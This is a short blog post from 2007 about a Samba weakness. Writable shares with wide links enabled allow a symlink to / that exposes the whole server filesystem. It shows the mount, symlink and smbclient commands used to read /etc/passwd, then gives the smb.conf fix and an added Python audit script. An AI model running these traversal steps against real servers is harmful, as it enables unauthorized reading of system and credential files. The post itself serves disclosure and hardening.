M E T A E Y E SG

[ Archive for June, 2007 ]

•  Watch out for writable samba shares.

I noticed a security issue with the default Samba configurations shipped with most Linux distros.

For example, let's say we have a system A with a writable share XYZ. On another system B,
we mount the share and create a symbolic link to /, i.e. to the root directory.

[root@B] smbmount //A/XYZ /mnt/share -o username=test
Password:
[root@B] ln -s / /mnt/share/ROOT

Now use the smbclient tool to access the share:

[root@B] smbclient -U test //A/XYZ
Password:
Domain=[A] OS=[Unix] Server=[Samba 3.0.26a]
smb: \> ls ROOT/etc/passwd
passwd 879 Tue Sep 4 16:11:56 2007
37760 blocks of size 1048576. 9355 blocks available
smb: \>

As you can see, the whole file system is now accessible: the attacker can download all
accessible files across the file system on A.

To make sure this does not happen, add the following directive to the [global] section
of smb.conf.

wide links=no
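
An added example, not part of the original post: a small Python audit that reads smb.conf text and lists the writable shares where wide links is still in effect. The sample configuration is constructed, and wide_links_default=True is an assumption matching the default behaviour the post describes; set it to match your Samba version.

```python
TRUE = {"yes", "true", "on", "1"}
WRITE_KEYS = {"writable", "writeable", "writeok"}  # inverted synonyms of "read only"
def parse(text):
    """Parse smb.conf text into {section: [(param, value), ...]} in file order."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = sections.setdefault(line[1:-1].strip(), [])
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            # Samba ignores case and spaces in parameter names.
            current.append((key.replace(" ", "").lower(), value.strip().lower()))
    return sections

def apply(params, state):
    """Return a copy of state with params applied in order (last setting wins)."""
    state = dict(state)
    for key, value in params:
        if key == "readonly":
            state["writable"] = value not in TRUE
        elif key in WRITE_KEYS:
            state["writable"] = value in TRUE
        elif key == "widelinks":
            state["wide"] = value in TRUE
    return state

def risky_shares(text, wide_links_default=True):  # the default is an assumption
    """List writable shares where wide links is in effect."""
    sections = parse(text)
    glob = next((p for n, p in sections.items() if n.lower() == "global"), [])
    base = apply(glob, {"writable": False, "wide": wide_links_default})
    return [n for n, p in sections.items()
            if n.lower() != "global" and all(apply(p, base).values())]

# Constructed sample configuration (not taken from a real server).
SAMPLE = """\
[global]
   ; wide links unset: server default applies
[XYZ]
   writable = yes
[docs]
   read only = yes
[scratch]
   write ok = yes
   wide links = no
"""
print(risky_shares(SAMPLE))  # ['XYZ']
```

A per-share "wide links = yes" overrides the [global] setting, so the audit evaluates each share after applying [global] first.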



[ © MSG ]